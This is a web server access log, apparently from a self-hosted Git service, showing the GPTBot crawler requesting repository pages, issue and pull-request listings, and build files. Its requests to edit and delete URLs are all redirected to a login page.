"/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=oldest&state=closed&type=all" +[17/Feb/2026:18:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol.exe?display=rendered" [Client 74.7.227.38] [Length 10887] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol.exe" +[17/Feb/2026:18:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&state=open&type=all" [Client 74.7.227.38] [Length 9964] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" +[17/Feb/2026:18:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:20:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:20:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10074] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:18:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10255] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:18:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:18:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:18:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:18:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:18:20:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=rendered" [Client 74.7.227.38] [Length 11775] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:18:20:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=source" [Client 74.7.227.38] [Length 12169] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:18:20:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&state=open&type=all" +[17/Feb/2026:18:20:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 74.7.227.38] [Length 11994] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" +[17/Feb/2026:18:20:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:20:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 11168] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Header.tsx" +[17/Feb/2026:18:20:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:20:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" +[17/Feb/2026:18:20:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" +[17/Feb/2026:18:20:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:20:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%20PostgreSQL%20%EC%9E%91%EC%97%85.md" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%20PostgreSQL%20%EC%9E%91%EC%97%85.md" +[17/Feb/2026:18:20:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11616] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:20:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11504] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:20:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:20:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11173] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:20:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 74.7.227.38] [Length 947] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" +[17/Feb/2026:18:20:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" +[17/Feb/2026:18:20:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" +[17/Feb/2026:18:20:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" +[17/Feb/2026:18:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" +[17/Feb/2026:18:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 74.7.227.38] [Length 9837] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" +[17/Feb/2026:18:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 74.7.227.38] [Length 11276] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" +[17/Feb/2026:18:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 74.7.227.38] [Length 963] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" +[17/Feb/2026:18:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2f%20PostgreSQL%20%ec%9e%91%ec%97%85.md" [Client 74.7.227.38] [Length 20791] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%20PostgreSQL%20%EC%9E%91%EC%97%85.md" +[17/Feb/2026:18:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:18:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11618] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11081] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24302] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11098] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:18:20:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15272] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:20:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr 